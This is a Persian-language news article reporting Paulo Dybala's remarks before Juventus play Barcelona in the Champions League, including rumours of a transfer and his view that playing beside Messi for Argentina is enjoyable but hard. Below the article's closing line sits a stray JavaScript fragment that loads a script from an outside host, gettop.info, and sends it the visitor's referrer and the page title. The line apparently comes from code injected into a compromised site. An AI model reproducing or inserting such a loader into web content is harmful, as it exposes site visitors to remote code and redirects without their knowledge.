دیبالا: بازی کردن کنار مسی سخت است


دیبالا

ستاره آرژانتینی یوونتوس تاکید کرد که بازی کردن در کنار مسی لذت بخش اما در عین حال سخت است.

به‌ گزارش ‌سادس ‌و ‌به نقل از مدیاست، یوونتوس در یکی از حساس‌ترین بازی‌های هفته نخست لیگ قهرمانان اروپا باید به مصاف بارسلونا برود.

دیبالا، ستاره یوونتوس که از او به عنوان مسی جدید یاد می‌شود درباره این دیدار حساس گفت‌: پارسال برابر بارسلونا بسیار خوب بازی کردم و توانستم دو گل به ثمر برسانم. در حال‌ حاضر همه این انتظار را دارند که دوباره برابر بارسلونا بدرخشم ولی این اصلا آسان نیست.

او ‌اضافه کرد: بارسلونا ستاره‌ای بزرگ همچون نیمار را از دست داده اما این باعث نمی‌شود که بازی کردن برابر این تیم آسان شود. بارسلونا در هر حالتی بزرگ است و بدون شک بازی سختی برابر این تیم بزرگ پیش رو داریم.

دیبالا درباره شایعه حضورش در بارسلونا گفت‌: من چیزی نمی‌دانم. فعلا بازیکن یوونتوس هستم و از این که پیراهن شماره ۱۰ این تیم را بر تن دارم افتخار می‌کنم. با این حال باید بگویم که نمی‌دانم در آینده چه اتفاقی خواهد افتاد.

ستاره تیم‌ ‌ملی فوتبال آرژانتین درباره هم‌بازی شدن با مسی در تیم‌ ‌ملی، اظهار کرد: بازی کردن در کنار مسی لذت بخش است و من چیزهای زیادی از او یاد خواهم گرفت اما در ‌عین ‌حال باید اعتراف کنم که بازی کردن در کنار مسی سخت است چون هر دوی ما در یک پست بازی می‌کنیم. به‌ هر حال من باید خودم را با مسی هماهنگ کنم و از او چیزهای بیشتری یاد بگیرم.

انتهای پیام

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *